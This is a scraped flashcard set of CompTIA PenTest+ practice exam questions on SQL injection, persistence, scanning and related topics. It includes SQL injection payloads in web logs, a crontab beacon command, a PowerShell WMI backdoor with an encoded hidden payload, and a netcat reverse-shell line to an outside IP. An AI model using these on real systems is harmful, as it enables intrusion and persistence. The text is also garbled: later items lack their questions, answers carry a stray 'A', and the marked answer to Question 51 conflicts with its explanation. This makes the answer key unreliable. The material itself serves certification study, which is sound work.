Tamera just purchased a Wi-Fi-enabled Nest Thermostat for her home. She has hired you to install it, but she is worried about a hacker breaking into the thermostat since it is an IoT device. Which of the following is the BEST thing to do to mitigate Tamera’s security concerns? (Select TWO)
A.Configure the thermostat to connect to the wireless network using WPA2 encryption and a long strong password
B.Disable wireless connectivity to the thermostat to ensure a hacker cannot access it
C.Configure the thermostat to use a segregated part of the network by installing it into a DMZ
D.If the devices website supports two factor authentication (if supported by the company)
E.Upgrade the firmware of the wireless access point to the latest version to improve the security of the network

Answer

A

A.Configure the thermostat to connect to the wireless network using WPA2 encryption and a long strong password
C.Configure the thermostat to use a segregated part of the network by installing it into a DMZ

Explanation
OBJ-2.5: The BEST options are to configure the thermostat to use the WPA2 encryption standard (if supported) and place any Internet of Things (IoT) devices into a DMZ to segregate them from the production network. While enabling two-factor authentication on the device’s website is a good practice, it will not increase the IoT device’s security. While disabling the wireless connectivity to the thermostat will ensure it cannot be hacked, it also will make the device ineffective for the customer’s normal operational needs. WEP is considered a weak encryption scheme, so you should use WPA2 over WEP whenever possible. Finally, upgrading the wireless access point’s firmware is good for security, but it isn’t specific to the IoT device’s security. Therefore, it is not one of the two BEST options.

Question 45

Q

Which of the following is a common attack model of an APT attack?
A.Involves sophisticated DDoS Attacks
B.Quietly gathers information from compromised systems
C.Holds an organizations data hostage using encryption
D.Relies on worms to spread laterly

Answer

A

B.Quietly gathers information from compromised systems

Explanation:
OBJ-1.3: An APT refers to an adversary’s ongoing ability to compromise network security by using various tools and techniques to obtain and maintain access. An APT is usually a highly sophisticated nation-state threat actor that quietly gathers information from compromised systems and can lay in waiting for several months during an ongoing attack. In general, an APT is primarily focused on espionage and strategic advantage, but some target companies purely for commercial gain. An APT is unlikely to conduct a DDoS attack, use worms to spread throughout the network, or use ransomware as part of their covert attacks.

Question 46

Q

You are analyzing the logs of a web server. Consider the following log sample:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
84. 55.41.57- - [14/Apr/2016:08:22:13 0100] “GET /wordpress/wp-content/plugins/custom_plugin/check_user.php?userid=1 AND (SELECT 6810 FROM(SELECT COUNT(),CONCAT(0x7171787671,(SELECT (ELT(6810=6810,1))),0x71707a7871,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) HTTP/1.1” 200 166 “-“ “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)”

55.41.57- - [14/Apr/2016:08:22:13 0100] “GET /wordpress/wp-content/plugins/custom_plugin/check_user.php?userid=(SELECT 7505 FROM(SELECT COUNT(),CONCAT(0x7171787671,(SELECT (ELT(7505=7505,1))),0x71707a7871,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) HTTP/1.1” 200 166 “-“ “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)”
55.41.57- - [14/Apr/2016:08:22:13 0100] “GET /wordpress/wp-content/plugins/custom_plugin/check_user.php?userid=(SELECT CONCAT(0x7171787671,(SELECT (ELT(1399=1399,1))),0x71707a7871)) HTTP/1.1” 200 166 “-“ “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)”
55.41.57- - [14/Apr/2016:08:22:27 0100] “GET /wordpress/wp-content/plugins/custom_plugin/check_user.php?userid=1 UNION ALL SELECT CONCAT(0x7171787671,0x537653544175467a724f,0x71707a7871),NULL,NULL– HTTP/1.1” 200 182 “-“ “Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)”
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on the logs above, which of the following type of attacks was conducted against this server?
A.SQL Injection
B.XML Injection
C.Cross-site scripting
D.Directory traversal

Answer

A

A.SQL Injection

Explanation:
OBJ-3.4: SQL injection is a code injection technique that is used to attack data-driven applications. SQL injections are conducted by inserting malicious SQL statements into an entry field for execution. For example, an attacker may try to dump the contents of the database by using this technique. A common SQL injection technique is to insert an always true statement, such as 1 == 1, or in this example, 6810 = = 6810. In this case, the SQL injection is evidenced by the SQL statements being sent to the web application hosted by WordPress. XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic. The injection of unintended XML content and/or structures into an XML message can alter the application’s intended logic. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in a browser side script, to a different end-user. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with “dot-dot-slash (../)” sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files.

Question 47

Q

A penetration tester hired by a bank began searching for the bank's IP ranges by performing lookups on the bank's DNS servers, reading news articles online about the bank, monitoring what times the bank's employees came into and left work, searching job postings (with a special focus on the bank's information technology jobs), and even searching the corporate office of the bank's dumpster. Based on this description, what portion of the penetration test is being conducted?
A.Active Information Gathering
B.Information reporting
C.Passive Information gathering
D.Vulnerability assessment

Answer

A

C.Passive Information gathering

Explanation:
OBJ-2.1: Passive information gathering consists of numerous activities where the penetration tester gathers open-source or publicly available information without the organization under investigation being aware that the information has been accessed. Instead, active information gathering starts to probe the organization using DNS Enumeration, Port Scanning, and OS Fingerprinting techniques. Vulnerability assessments are another form of active information gathering. Information reporting occurs after the penetration test is complete, and it involves writing a final report with the results, vulnerabilities, and lessons learned during the assessment.

Question 48

Q

Which of the protocols listed is NOT likely to trigger a vulnerability scan alert when used to support a virtual private network (VPN)?
A.SSLv2
B.PPTP
C.SSLv3
D.IPSec

Answer

A

D.IPSec

Explanation:
OBJ-2.2: IPSec is the most secure protocol that works with VPNs. The use of PPTP and SSL is discouraged for VPN security. Due to this, PPTP and SSL for a VPN will likely alert during a vulnerability scan as an issue to be remediated.

Question 49

Q

You are analyzing the vulnerability scanning results from a recent web vulnerability scan in preparation for the exploitation phase of an upcoming assessment.
A portion of the scan results is shown below. Which exploit is the website vulnerable to based on the results?
A.Local file inclusion
B.Session hijacking
C.SQL Injection
D.Cookie manipulation

Answer

A

C.SQL Injection

Explanation:
OBJ-2.3: The most common type of code injection is SQL injection. An SQL injection attempts to modify one or more of an SQL query’s four basic functions: select, insert, delete, or update. Two common methods of performing an SQL injection are either using a single apostrophe (‘) or submitting an always true statement like 1=1. In the scan results, you can see that a statement of “1 OR 17 - 7 = 10” was used. Notice that %20 is the ASCII encoded equivalent of the space character. As a penetration tester, you need to be familiar with common ASCII encoded text used in URLs equivalents like %20 (space), %5c (), and %2F (/) to identify SQL injections and file inclusions.

Question 50

Q

You are conducting a code review of a program and observe the following calculation of 0xffffffff + 1 was attempted, but the result was returned as 0x0000000. Based on this, what type of exploit could be created against this program?
A.Password spraying
B.Impersonation
C.SQL Injection
D.Integer overflow attack

Answer

A

D.Integer overflow attack

Explanation:
OBJ-3.4: Integer overflows and other integer manipulation vulnerabilities frequently result in buffer overflows. An integer overflow occurs when an arithmetic operation results in a large number to be stored in the space allocated for it. Integers are stored in 32 bits on the x86 architecture; therefore, if an integer operation results in a number greater than 0xffffffff, an integer overflow occurs, as was the case in this example. SQL injection is an attack that injects a database query into the input data directed at a server by accessing the application’s client-side. Password spraying is a type of brute force attack in which multiple user accounts are tested with a dictionary of common passwords. Impersonation is the act of pretending to be another person or system for fraud.

Question 51

Q

Sarah is conducting a penetration test against Dion Training’s Linux-based network. This engagement aims to simulate an advanced persistent threat and demonstrate persistence for 30 days without their system administrators identifying the intrusion. Which of the following commands should Sarah use to run a script that beacons back to her computer every 20 minutes?
A.schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MONTHLY /mo 20 /ru SYSTEM
B.(crontab -l ; echo “/20 * * * /tmp/beacons.sh”)| crontab -
C. (crontab -l ; echo “**/20* * * * /tmp/beacon.sh”)| crontab -
D.schtasks /create /tn beacon /tr C:\temp\beacon.bat /sc MINUTE /mo 20 /ru SYSTEM

Answer

A

B.(crontab -l ; echo “/20** /tmp/beacons.sh”)| crontab -

Explanation:
OBJ-3.7: A scheduled task or scheduled job is an instance of execution, like initiating a process or running of a script, that the system performs on a set schedule. Once the task executes, it can prompt for user interaction or run silently in the background; it all depends on what the task is set up to do. Scheduled tasks in Linux use the crontab command. The correct answer for this persistence is to enter the command “(crontab -l ; echo “*/20 * * * * /tmp/beacon.sh”)| crontab -“ that will run the script at “/tmp/beacon.sh every 20 minutes as the SYSTEM level user. The other variant of crontab is incorrect because it would run every 20 hours, not 20 minutes. The schtasks options are used in Windows, not in Linux.

Question 52

Q

Sagar is planning to patch a production system to correct a detected vulnerability during his most recent network vulnerability scan. What process should he follow to minimize the risk of a system failure while patching this vulnerability?
A.Contact the vendor to determine a safe time frame for deploying the patch into the production environment
B.Deploy the patch in a sandbox environment to test it prior to patching the production system
C.Wait 60 days to deploy the patch to ensure there are no associated bugs reported with it
D.Deploy the patch immediately on the production system to remediate the vulnerability

Answer

A

B.Deploy the patch in a sandbox environment to test it prior to patching the production system

Explanation:
OBJ-5.3: While patching a system is necessary to remediate a vulnerability, you should always test the patch before implementation. It is considered a best practice to create a staging or sandbox environment to test the patches’ installation before installing them into the production environment. This reduces the risks of the patch breaking something in the production system. Unless you are dealing with a very critical vulnerability and the risk of not patching is worse than the risk of patching the production system directly, you should not immediately patch the production systems without testing the patch first. You should not wait 60 days to deploy the patch. Waiting this long provides attackers an opportunity to reverse engineer the patch and creating a working exploit against the vulnerability. Finally, asking the vendor for a safe time frame is not helpful since the vendor does not know the specifics of your environment or your business operations.

Question 53

Q

Cybersecurity analysts are experiencing some issues with their vulnerability scans aborting because the previous day's scans are still running when the scanner attempts to start the current day's scans. Which of the following recommendations is LEAST likely to resolve this issue?
A.Reduce the sensitivity of scans
B.Reduce the frequency of scans
C.Reduce the scope of scans
D.Add another vulnerability scanner

Answer

A

A.Reduce the sensitivity of scans

Explanation:
OBJ-2.2: If the cybersecurity analyst were to reduce the scans’ sensitivity, it still would not decrease the time spent scanning the network and could alter the effectiveness of the results received. In this scenario, the scans, as currently scoped, are taking more than 24 hours to complete with the current resources. The analyst could reduce the scans’ scope, thereby scanning fewer systems or vulnerabilities signatures and taking less time to complete. Alternatively, the analyst could reduce the scans’ frequency by moving to a less frequent schedule, such as one scan every 48 hours or one scan per week. The final option would be to add additional vulnerability scanners to the process. This would allow the two scanners to work together to divide the workload and complete the task within the 24-hour scan frequency currently provided.

Question 54

Q

Which of the following tools allows a penetration tester to quickly locate exploits in the Exploit Database archive?
A.Responder
B>Empire
C.Powersploit
D.Searchsploit

Answer

A

D.Searchsploit

Explanation:
OBJ-4.2: Searchsploit is a tool included in the exploitdb package on Kali Linux that enables you to search the Exploit Database archive. Empire (PowerShell Empire) is a post-exploitation framework for Windows devices that allows the attacker to run PowerShell agents without needing powershell.exe. It is commonly used to escalate privileges, launch other modules to capture data, extract passwords, and install persistent backdoors. Powersploit is a series of Microsoft PowerShell scripts that pen testers can use in post-exploit scenarios. Responder is a fake server and relay tool that is included with Kali Linux. It responds to LLMNR, NBT-NS, POP, IMAP, SMTP, and SQL queries to recover sensitive information such as user names and passwords.

Question 55

Q

If you want to conduct an operating system identification during a nmap scan, which syntax should you utilize?
A.nmap -id
B.nmap -O
C.nmap -os
D.nmap -osscan

Answer

A

B.nmap -O

Explanation:
OBJ-4.1: The -O flag indicates to nmap that it should attempt to identify the target’s operating system during the scanning process. It does this by evaluating the responses it received during the scan against its signature database for each operating system.

Question 56

Q

You received an incident response report indicating a piece of malware was introduced into the company’s network through a remote workstation connected to the company’s servers over a VPN connection. Which of the following controls should be applied to prevent this type of incident from occurring again?
A.ACL
B.MAC Filtering
C.NAC
D.SPF

Answer

A

C.NAC

Explanation:
OBJ-5.3: Network Access Control (NAC) is an approach to computer security that attempts to unify endpoint security technology (such as anti-virus, host intrusion prevention, and vulnerability assessment), user or system authentication, and network security enforcement. When a remote workstation connects to the network, NAC will place it into a segmented portion of the network (sandbox), scan it for malware and validate its security controls, and then based on the results of those scans, either connect it to the company’s networks or place the workstation into a separate quarantined portion of the network for further remediation. An access control list (ACL) is a network traffic filter that can control incoming or outgoing traffic. An ACL alone would not have prevented this issue. MAC Filtering refers to a security access control method whereby the MAC address assigned to each network card is used to determine access to the network. MAC filtering operates at layer 2 and is easy to bypass. Sender Policy Framework (SPF) is an email authentication method designed to detect forging sender addresses during the email delivery.

Question 57

Q

Which of the following is true concerning LM hashes?
A.LM hashes are based on AES128 cryptographic standard
B.LM hashes are not generated when the password length exceeds 15 characters
C.LM hashes consist of 48 hexdecimals characters
D.Uppercase characters in the password are converted to lowercase

Answer

A

B.LM hashes are not generated when the password length exceeds 15 characters

Explanation:
OBJ-3.4: LM hash, also known as LanMan hash or LAN Manager hash, is a compromised password hashing function. This was the primary hash that Microsoft LAN Manager and Microsoft Windows versions before Windows NT used to store user passwords. Support for the legacy LAN Manager protocol continued in later versions of Windows for backward compatibility. Still, it was recommended by Microsoft to be turned off by administrators due to the LM hash’s weak strength. LM hashes are not generated when the password length exceeds 15 characters since it is stored as a 16-byte value.

Question 58

Q

You are working as part of a DevSecOps team at Dion Training on a new practice exam Android application. You need to conduct static analysis on the APK (Android PacKage) as part of your software assurance responsibilities. Which of the following tools should you utilize?
A.Decompile the DEX to a JAR file and then convert the JAR into Java
B.Convert the DEX to a JAR file and then decompile the JAR into Java
C.COnvert the Java code in the APK to a JAR file and then cross-compile it to a DEX
D.Compile the APK into a JAR and then convert it into the DEX source code

Answer

A

B.Convert the DEX to a JAR file and then decompile the JAR into Java

Explanation:
OBJ-4.2: Android apps come packaged as APKs (Android PacKages). The APK contains all the application files, including the DEX file (Android bytecode/binary). To reverse the APK into source code to conduct a static analysis, you can convert the DEX file to a JAR (Java Archive) file. Then, you can decompile the JAR file into Java source code using a decompiler. While the specifics on how to do all of this are beyond the exam’s scope, you should understand the concepts and basic steps involved per the exam objectives.

Question 59

Q

You are drafting the technical constraints for an upcoming penetration test. Which of the following would be a correct example of a technical constraint in a scoping document?
A.The legacy server may not be subject to a DoS or buffer overflow during attack during this engagement
B.All findings must be kept confidential and only shared with personnel listed in this agreement
C.Passive reconnaissance shall not be used during this engagement
D.Spearphishing of employees is not allowed during this engagement

Answer

A

A.The legacy server may not be subject to a DoS or buffer overflow during attack during this engagement

Explanation:
OBJ-1.1: A technical constraint is any item that is specifically excluded from the penetration test engagement. In general, these constraints will be technical in nature. For example, a legacy server may be considered too fragile to withstand denial of service or buffer overflow attacks. Other technical constraints may focus on the tools used based on the cost that would be involved. For example, it may be too costly to perform a USB key drop in the parking lot of a remote data center, so there may be a technical constraint to only allow remote attacks during the engagement.

Question 60

Q

You are planning a penetration test against an organization. During your reconnaissance, you determined that they are using an embedded device to control their office's physical security. The device looks similar to a Raspberry Pi. Your goal in this engagement is to gain root access to this device using physical penetration testing techniques. Which of the following attacks should you utilize to gain root access?
A.COnnect to the serial console
B.Credential brute forcing
C.JTAG debugging
D.COld boot attack

Answer

A

C.JTAG debugging

Explanation:
OBJ-3.5: JTAG debugging is a troubleshooting methodology used by the manufacturer to test printed circuit boards and embedded systems. The circuit board of these systems has a JTAG connector that provides a simple and direct hardware interface that allows you to connect a computer directly to the board to communicate with its integrated chips. An experienced penetration tester can use this connection to communicate directly with the board to gain root access to the system.

Question 61

Q

A coworker sent you the following PowerShell script to use during an upcoming engagement for Dion Training’s corporate network:

-=-=-=-=-=-
$StaticClass = New-Object Management.ManagementClass(‘root\cimv2’, $null,$null)
$StaticClass.Name = ‘Win32_Backdoor’
$StaticClass.Put()| Out-Null
$StaticClass.Properties.Add(‘Code’ , “cmd /c start calc.exe

& taskkill /f /im powershell.exe

& waitfor persist

& powershell -nop -W Hidden -E
JA
BlAHgAZQBjAD0AKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwBXAGkAbgAzADIAXwBCAGEAYwBrAGQAbwBvAHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAQwBvAGQA
ZQAnAF0ALgBWAGEAbAB1AGUAOwAgAGkAZQB4ACA
AJABlAHgAZQBjAA==”)
$StaticClass.Put() | Out-Null

During the upcoming engagement, what should you use this script to perform?
A.Encrypting data
B.Collecting logs
C.Covering your tracks
D.Gaining persistence

Answer

A

D.Gaining persistence

Explanation

OBJ-4.4: This short PowerShell script is used to gain persistence by creating a backdoor in a Windows system. Once this script is run on the system, it will create an MMC class with a backdoor. This code also launches the calculator (because it is meant to be benign for demonstration purposes) and then waits for an attacker’s system to connect to its backdoor.

Question 62

Q

Dion Training requires that the staff simulate their response to a potential data breach. During this simulation, the staff gathers in the conference room and discusses each action they would take as part of their response. This information is then analyzed to ensure the company's data breach response playbook is up to date and would work properly when needed. Which of the following best describes what the staff did?
A.Disaster recovery planning
B.Business impact analysis
C.Incident response
D.Tabletop exercise

Answer

A

D.Tabletop exercise

Explanation:
OBJ-5.4: A tabletop exercise involves gathering the key staff of an organization and discussing their actions during a potential unwanted event. The staff could further be divided into a blue team and a red team, with half playing the role of defenders and the other half playing the adversary’s role. Tabletop exercises are less expensive to conduct than a full-scale red team event or penetration test. Tabletop exercises are a great way to exercise existing procedures and response plans to identify any weaknesses within them.

Question 63

Q

A factory worker suspects that a legacy workstation is infected with malware. The workstation runs Windows XP and is used as part of an ICS/SCADA system to control industrial factory equipment. The workstation is connected to an isolated network that cannot reach the internet. The workstation receives the patterns for the manufactured designs through a USB drive. A technician is dispatched to remove the malware from this workstation. After its removal, the technician provides the factory worker with a new USB drive to move the pattern files to the workstation. Within a few days, the factory worker contacts the technician again to report the workstation appears to be reinfected with malware. Which of the following steps did the technician MOST likely forget to perform to prevent reinfection?

A.Identify and research malware symptoms
B.Update the anti-malware solution
C.Quarantine the infected system
D.Disable System Restore (in WIndows)
E.Enable  System Restore and create a restore point (in WIndows)
E.Remediate the infected systems

Answer

A

B.Update the anti-malware solution

Explanation:
OBJ-2.5: Since the workstation is isolated from the internet, the anti-malware solution will need to be manually updated to ensure it has the latest virus definitions. Without the latest virus definitions, the system can easily become reinfected.

Question 64

Q

What type of weakness is John the Ripper used to test during a technical assessment?
A.Usernames
B.Passwords
C.Firewall rulesets
D.FIle permissions

Answer

A

B.Passwords

Explanation:
OBJ-4.2: John the Ripper is a free, open-source password cracking software tool. It tests the strength of passwords during a technical assessment. John the Ripper supports both dictionary and brute force attacks.

Answer 65

A

D.Items classified by the system as Low or as For Information Purposes Only

Explanation
OBJ-2.3: When conducting a vulnerability scan, it is common for the report to include some findings that are classified as “low” priority or “for informational purposes only.” These are most likely false positives and can be ignored by the analyst when starting their remediation efforts. “An HTTPS entry that indicates the web page is securely encrypted” is not a false positive but a true negative (a non-issue). A scan result showing a different version from the automated asset inventory should be investigated and is likely a true positive. A finding that shows the scanner compliance plug-ins are not up-to-date would likely also be a true positive that should be investigated.

Answer 66

A

B.Unauthorized privileges are being utilized

Explanation:
OBJ-3.5: This appears to be an indication that unauthorized privileges are being used. The first binary, svchost.exe, executes from an odd location that indicates it might be malicious). The process svchost.exe doesn’t usually reside in the inetsrv folder in a Windows system since this folder contains the Windows IIS web server files. Additionally, this file then spawned a binary that appears to be masquerading as a Windows process, the WMI Provider Host called wmiprvse.exe. This appears to be the beginning of a privilege escalation attack. Based on the output above, there is no evidence that data is being exfiltrated or stolen from the network. Based on the output above, there is no evidence that any network protocol is currently used over a non-standard port. Finally, there is no evidence of beaconing or network activity in this output.

Answer 67

A

A.Base64

Explanation
OBJ-3.4: While there are many different formats used by attackers to obfuscate their malicious code, Base64 is by far the most popular. If you see a string like the one above, you can decode it using an online Base64 decoder. In fact, I recommend you copy the string above and decode it to see how easy it is to reverse a standard Base64 encoded message. Some more advanced attackers will also use XOR and a key shift in combination with Base64 to encode the message and make it harder to decode, but using a tool like CyberChef can help you decode those. Structured Query Language (SQL) is used to communicate with a database. Extensible Markup Language (XML) is a markup language that defines a set of rules for encoding documents in a human-readable and machine-readable format. SQL and XML are not considered obfuscation techniques. A QR Code is a two-dimensional version of the barcode, known from product packaging in the supermarket. QR coding is the process of converting some data into a single QR code. QR coding might be considered a form of obfuscation, but it is not shown in this question’s example output.

Answer 68

A

A.An uncredentialed scan of the network was performed

Explanation:
OBJ-2.2: Uncredentialed scans are generally unable to detect many vulnerabilities on a device. When conducting an internal assessment, you should perform an authenticated (credentialed) scan of the environment to most accurately determine the network’s vulnerability posture. In most enterprise networks, if a vulnerability exists on one machine, it also exists on most other workstations since they use a common baseline or image. If the scanner failed to connect to the workstations, an error would have been generated in the report

Answer 69

A

A.Mitigate

Explanation:
OBJ-5.1: Mitigating a risk makes the effect of a risk a little less unpleasant, harmful, or serious. The majority of risk management is focused on mitigating risks down to an acceptable level of loss or risk. The risk response actions are accept, avoid, mitigate, or transfer.

Answer 70

A

B.You are scanning a CDN-hosted copy of the site

Explanation:
OBJ-2.3: This result is due to the company using a distributed server model that hosts content on Edge servers worldwide as part of a CDN. A content delivery network (CDN) is a geographically distributed network of proxy servers and their data centers that provide high availability and performance by distributing the service spatially relative to end-users. The requested content may be served from the Edge server’s cache or pull the content from the main diontraining.com servers. If you are scanning a web server or application hosted with a CDN, you need to be aware that you might be scanning an edge copy of the site and not receive accurate results. While an edge server usually maintains static content, it is still useful to determine if any vulnerabilities exist in that portion of the site content. Distributed denial-of-service (DDoS) attacks range from small and sophisticated to large and bandwidth-busting. While Akamai does provide excellent DDoS protection capabilities, nothing in this question indicates that the server is attempting to stop your scans or is assuming you are conducting a DDoS attack against it.

Answer 71

A

B.Ensure the patches are deployed

Explanation:
OBJ-5.3: A patch is designed to correct a known bug or fix a known vulnerability. In this case, the reading of SSL traffic in a piece of software.

Answer 72

A

A.Registry startup

Explanation:
OBJ-3.7: A penetration tester can use the “reg add” command to cause a particular program or command to start every time the Windows machine is booted up. To achieve this, the penetration tester stores the program in the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run registry keys. The first one will cause the program to run whenever any user logs into the machine. The second will only cause the program to start when the victimized user logs in again.

Answer 73

A

B.John does not have permission to perform the scan

Explanation:
OBJ-1.2: All options listed are an issue, but the most significant issue is that John does not have the client’s permission to perform the scan. A vulnerability scan may be construed as a form of reconnaissance, penetration testing, or even an attack on the organization’s systems. A cybersecurity analyst should never conduct a vulnerability scan on another organization’s network without explicit written permission. In some countries, a vulnerability scan against an organization’s network without their permission is considered a cybercrime and could result in jail time for the consultant.

Answer 74

A

B.Input validation

Explanation:
OBJ-5.3: Input validation prevents the attacker from sending invalid data to an application and is a strong control against both SQL injection and cross-site scripting attacks. A network layer firewall is a device that is designed to prevent unauthorized access, thereby protecting the computer network. It blocks unauthorized communications into the network and only permits authorized access based on the IP address, ports, and protocols in use. Cross-site request forgery (CSRF) is another attack type. A hypervisor controls access between virtual machines.

Answer 75

A

C.Authority

Explanation:
OBJ-3.1: Authority is used to take advantage of people’s willingness to act when directed to by someone with the power or right to give orders. For example, an attacker may pose as a police officer, government agent, or high-level executive to force an employee to take some form of action, whether it is ethically dubious or counter to their own interests.

Answer 76

A

B.Logic bomb

Explanation:
OBJ-1.3: A logic bomb is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. For example, a programmer may hide a piece of code that starts deleting files should they ever be terminated from the company. The director is concerned that a logic bomb may have been created and installed on his system or across the network before the analyst was fired.

Answer 77

A

D.nc 45.58.12.123.52154 -e /bin/sh

Explanation:
OBJ-3.7: Netcat (nc) is an open-source networking utility for debugging and investigating the network, and that can be used to create TCP/UDP connections and investigate them. It is extremely popular with penetration testers and attackers alike due to its multiple use cases. You should be familiar with setting up a listener and establishing a connection to the listener using netcat. Using the -lp option sets up a listener on the machine using the port specified (52154 in this scenario). To start the connection to the listener, you would enter “nc -e “ substituting the details for each parameter in each set of brackets.

Answer 78

A

B.Someone used a SQL injection to assign straight A’s to the student with ID #1235235

Explanation:
OBJ-3.4: Based on this transaction log entry, it appears that the ID# field was not properly validated before being passed to the SQL server. This would allow someone to conduct an SQL injection and retrieve the student’s grades and set all of this student’s grades to an ‘A’ at the same time. It is common to look for a ‘1==1’ type condition to identify an SQL injection. There are other methods to conduct an SQL injection attack that could be utilized by an attacker. If input validation is not being performed on user-entered data, an attacker can exploit any SQL language aspect and inject SQL-specific commands. This entry is suspicious and indicates that either the application or the SQL database is not functioning properly. Still, there appears to be adequate logging and monitoring based on what we can see and whether the question never indicates logging was an issue. An SQL database would not be designed to set ALL of a particular student’s grades to A’s, thus making this single entry suspicious. Most SQL statements in an SQL log will be fairly uniform and repetitive by nature when you review them. This leaves us with the question as to who person this SQL injection. Per the question choices, it could be the student with ID# 1235235 or “someone.” While it seems as if student #1235235 had the most to gain from this, without further investigation, we cannot prove that it actually was student #1235235 that performed the SQL injection. Undoubtedly, student #125235 should be a person of interest in any ensuing investigations, but additional information (i.e., whose credentials were being used, etc.) should be used before making any accusations. Therefore, the answer is that “someone” performed this SQL injection.

Answer 79

A

A.Fuzzing

Explanation:
OBJ-4.2: Fuzzing is an automated software assessment technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions (crashes), failing built-in code assertions, or finding potential memory leaks. Dynamic code analysis relies on studying how the code behaves during execution. Fuzzing a specific type of dynamic code analysis, making it a better answer to this question. Static code analysis is a method of debugging by examining source code before a program is run. Known bad data injection is a technique where data known to cause an exception or fault is entered as part of the testing/assessment. With known bad data injections, you would not use randomly generated data sets, though.

Answer 80

A

A.Create a route statement in meterpreter

Explanation:
OBJ-4.2: Since the penetration tester has exploited the FTP server from outside the LAN, they will need to set up a route statement in meterpreter. Metasploit makes this very simple since it also has an autoroute meterpreter script that will allow us to attack this second network through our first compromised machine (the FTP server) and then create the routes needed.

Answer 81

A

C.tracert

Explanation:
OBJ-4.2: The TRACERT (trace route) diagnostic utility determines the route to a destination by sending Internet Control Message Protocol (ICMP) echo packets to the destination. In these packets, TRACERT uses varying IP Time-To-Live (TTL) values. When the TTL on a packet reaches zero (0), the router sends an ICMP “Time Exceeded” message back to the source computer. The ICMP “Time Exceeded” messages that intermediate routers send back show the route. The ipconfig tool displays all current TCP/IP network configuration values on a given system. The netstat tool is a command-line network utility that displays network connections for Transmission Control Protocol, routing tables, and some network interface and network protocol statistics on a single system. The nbtstat command is a diagnostic tool for NetBIOS over TCP/IP used to troubleshoot NetBIOS name resolution problems.

Answer 82

A

D.MOU

Explanation:
OBJ-1.2: MOU is a memorandum of understanding. This is the most accurate description based on the choices given. A memorandum of understanding is a document that describes the broad outlines of an agreement that two or more parties have reached. MOUs communicate the mutually accepted expectations of all of the parties involved in a negotiation. While not legally binding, the MOU signals that a binding contract is imminent.

Answer 83

A

B.Google results matching “financial” in domain diontraining.com, but no results from the site sales.diontraining.com

Explanation:
OBJ-2.1: When conducting a Google search, using site:AAA in the query will return results only from that website (AAA). If you use –site:AAA, you will get results not explicitly on the website (AAA). In the case of this question, no results should show up from sales.diontraining.com. All results should only come from diontraining.com.

Answer 84

A

C.nmap

Explanation:
OBJ-4.2: Nmap sends specially crafted packets to the target host(s) and then analyzes the responses to determine the open ports and services running on those hosts. Also, nmap can determine the versions of the applications being used on those ports and services. Nmap is a command-line tool for use on Linux, Windows, and macOS systems. The netstat (network statistics) tool is a command-line utility that displays network connections for incoming and outgoing TCP packets, routing tables, and some network interface and network protocol statistics. Still, it cannot identify open ports and services on a host with their version numbers. The ping tool is used to query another computer on a network to determine whether there is a valid connection. Wireshark is an open-source packet analyzer used for network troubleshooting, analysis, software and communications protocol development, and education.

Answer 85

A

D.VLAN

Explanation:
OBJ-5.3: A virtual local area network (VLAN) is a type of network segmentation configured in your network switches that prevent communications between different VLANs without using a router. This allows two virtually separated networks to exist on one physical network and separates the two virtual network’s data. A virtual private network (VPN) is a remote access capability to connect a trusted device over an untrusted network back to the corporate network. A VPN would not create the desired effect. WPA2 is a type of wireless encryption, but it will not create two different segmented networks on the same physical hardware. MAC filtering is used to allow or deny a device from connecting to a network, but it will not create two network segments, as desired.

Brainscape's Knowledge GenomeTM

CompTIA PenTest+ (PT0-001) Practice Certifications Exams (Jason DIon3 of 6) Flashcards

Brainscape's Knowledge Genome^TM